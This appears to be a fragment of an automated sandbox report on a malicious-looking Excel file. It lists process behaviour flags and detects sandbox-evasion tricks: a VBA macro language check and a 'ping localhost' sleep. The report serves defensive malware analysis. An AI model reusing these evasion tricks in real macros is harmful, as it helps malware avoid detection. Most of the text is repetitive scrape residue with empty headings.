Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Detected evasive VBA macro (language check)

Show sources

Source: MIL0001742828.xls	Stream path '_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro' : found possibly 'Application.LanguageSettings.Languageid' functions application.languagesettings.languageid
Source: VBA code instrumentation	OLE, VBA macro: Module Questa_cartella_di_lavoro, Function Finesta, found possibly 'Application.LanguageSettings.Languageid' functions application.languagesettings.languageid			Name: Finesta

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report MIL0001742828.xls

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion: